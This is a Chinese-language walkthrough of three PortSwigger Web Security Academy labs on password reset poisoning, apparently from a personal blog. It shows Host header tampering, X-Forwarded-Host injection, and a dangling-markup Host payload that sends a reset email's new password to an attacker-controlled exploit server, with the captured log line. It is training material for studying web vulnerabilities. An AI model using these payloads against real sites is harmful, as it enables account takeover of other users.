Web Security Academy的密码重置漏洞

地址： https://portswigger.net/web-security/host-header/exploiting/password-reset-poisoning

第一题 Lab: Basic password reset poisoning

这里给了一个用户名和密码，要求改另外一个人的密码。

开始，我们用自己的账号走一遍忘记密码的流程

在exploit server中，可以修改response，还有mail client，可以进入自己的邮箱。

登陆框点忘记密码,填入自己的用户名，邮箱收到重置邮件。可以看到这个邮件有个token，forgot-password?temp-forgot，应该是验证用户的token。

要想修改其他用户的密码就需要拿到这个token

我们对忘记密码处抓包

发现host随意改也可以发送成功，用自己的账号看看效果。

查看邮件，可以看到我们可以控制重置的链接

可以完整控制整个URL的前半部分

收到的token

那把收到的重置URL中的token换了，就可以改carlos的密码, 然后使用用户名和密码就可以的登录，完成这个实验。

第二题 Lab: Password reset poisoning via middleware

添加X-Forwarded-Host头，让这个头字段的值为你的测试服务器，让受害者点击，得到受害者的token

第三题 Lab: Password reset poisoning via dangling markup

提示：

发现，现在发邮件，都是直接重置密码，并且给了登录链接。

邮件的原文本：

Sent: 2020-10-22 02:01:08 +0000 From: no-reply@acd91f5a1f54ee6e8001093a0023008b.web-security-academy.net To: wiener@aca71f321fd0ee2980b109e801d2000c.web-security-academy.net Subject: Account recovery

<p>Hello!</p><p>Please <a href='https://acd91f5a1f54ee6e8001093a0023008b.web-security-academy.net/login'>click here</a> to login with your new password: ioktQ4hK0q</p><p>Thanks,<br/>Support team</p><i>This email has been scanned by the MacCarthy Email Security service</i>

看看哪里有可以控制的输入？ 这个链接？提示说会扫描链接，那只能修改链接。 修改host的值报错，直接跟一段字符，发现不报错

收到的邮件里面，也存在这一段字符，那找到了这个输入点。

<p>Hello!</p><p>Please <a href='https://acd91f5a1f54ee6e8001093a0023008b.web-security-academy.net:pxiaoer/login'>click here</a> to login with your new password: O2j49KvAgi</p><p>Thanks,<br/>Support team</p><i>This email has been scanned by the MacCarthy Email Security service</i>


把host修改为:
Host: acd91f5a1f54ee6e8001093a0023008b.web-security-academy.net:https:'<a href="//aca71f321fd0ee2980b109e801d2000c.web-security-academy.net/?

去修改其他用户的密码，在日志中找到了扫描器的访问记录，里面带了密码。

172.31.31.238 2020-10-22 02:32:57 +0000 "GET /?/login'>click+here</a>+to+login+with+your+new+password:+Fm91ZSIfei</p><p>Thanks,<br/>Support+team</p><i>This+email+has+been+scanned+by+the+MacCarthy+Email+Security+service</i> HTTP/1.1" 302

这样第三题也解决了。

Web Security Academy靶场进度：